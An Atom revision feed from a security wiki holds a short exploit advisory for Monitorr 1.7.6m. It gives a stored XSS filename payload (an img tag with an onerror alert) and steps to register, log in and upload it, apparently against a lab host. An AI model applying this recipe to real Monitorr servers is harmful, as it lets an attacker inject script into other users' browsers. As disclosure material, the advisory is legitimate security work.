<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=Montiorr_1.7.6m_%E6%96%87%E4%BB%B6%E4%B8%8A%E5%82%B3%26XSS%E6%BC%8F%E6%B4%9E</id>
	<title>Montiorr 1.7.6m 文件上傳&amp;XSS漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=Montiorr_1.7.6m_%E6%96%87%E4%BB%B6%E4%B8%8A%E5%82%B3%26XSS%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Montiorr_1.7.6m_%E6%96%87%E4%BB%B6%E4%B8%8A%E5%82%B3%26XSS%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-10T06:17:54Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=Montiorr_1.7.6m_%E6%96%87%E4%BB%B6%E4%B8%8A%E5%82%B3%26XSS%E6%BC%8F%E6%B4%9E&amp;diff=1907&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==EXP== &lt;pre&gt; # Exploit Title: Montiorr 1.7.6m - File Upload to XSS # Date: 25/4/2021 # Exploit Author: Ahmad Shakla # Software Link: https://github.com/Monitorr/Monitorr # Te...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Montiorr_1.7.6m_%E6%96%87%E4%BB%B6%E4%B8%8A%E5%82%B3%26XSS%E6%BC%8F%E6%B4%9E&amp;diff=1907&amp;oldid=prev"/>
		<updated>2021-04-27T11:45:54Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==EXP== &amp;lt;pre&amp;gt; # Exploit Title: Montiorr 1.7.6m - File Upload to XSS # Date: 25/4/2021 # Exploit Author: Ahmad Shakla # Software Link: https://github.com/Monitorr/Monitorr # Te...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==EXP==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Exploit Title: Montiorr 1.7.6m - File Upload to XSS&lt;br /&gt;
# Date: 25/4/2021&lt;br /&gt;
# Exploit Author: Ahmad Shakla&lt;br /&gt;
# Software Link: https://github.com/Monitorr/Monitorr&lt;br /&gt;
# Tested on: Kali GNU/Linux 2020.2&lt;br /&gt;
# Detailed Bug Description : https://arabcyberclub.blogspot.com/2021/04/monitor-176m-file-upload-to-xss.html&lt;br /&gt;
&lt;br /&gt;
An attacker can preform an XSS attack via image upload&lt;br /&gt;
&lt;br /&gt;
Steps :&lt;br /&gt;
&lt;br /&gt;
1)Create a payload with the following format :&lt;br /&gt;
&amp;gt;&amp;lt;img src=x onerror=alert(&amp;quot;XSS&amp;quot;)&amp;gt;.png&lt;br /&gt;
&lt;br /&gt;
2) Install the database by going to the following link :&lt;br /&gt;
https://monitorr.robyns-petshop.thm/assets/config/_installation/vendor/_install.php&lt;br /&gt;
&lt;br /&gt;
3)Register for a new account on the server by going to the following link :&lt;br /&gt;
https://monitorr.robyns-petshop.thm/assets/config/_installation/vendor/login.php?action=register&lt;br /&gt;
&lt;br /&gt;
4)Login with your credentials on the following link :&lt;br /&gt;
https://monitorr.robyns-petshop.thm/assets/config/_installation/vendor/login.php&lt;br /&gt;
&lt;br /&gt;
5)Go to the following link and upload the payload :&lt;br /&gt;
https://monitorr.robyns-petshop.thm/settings.php#services-configuration&lt;br /&gt;
            &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>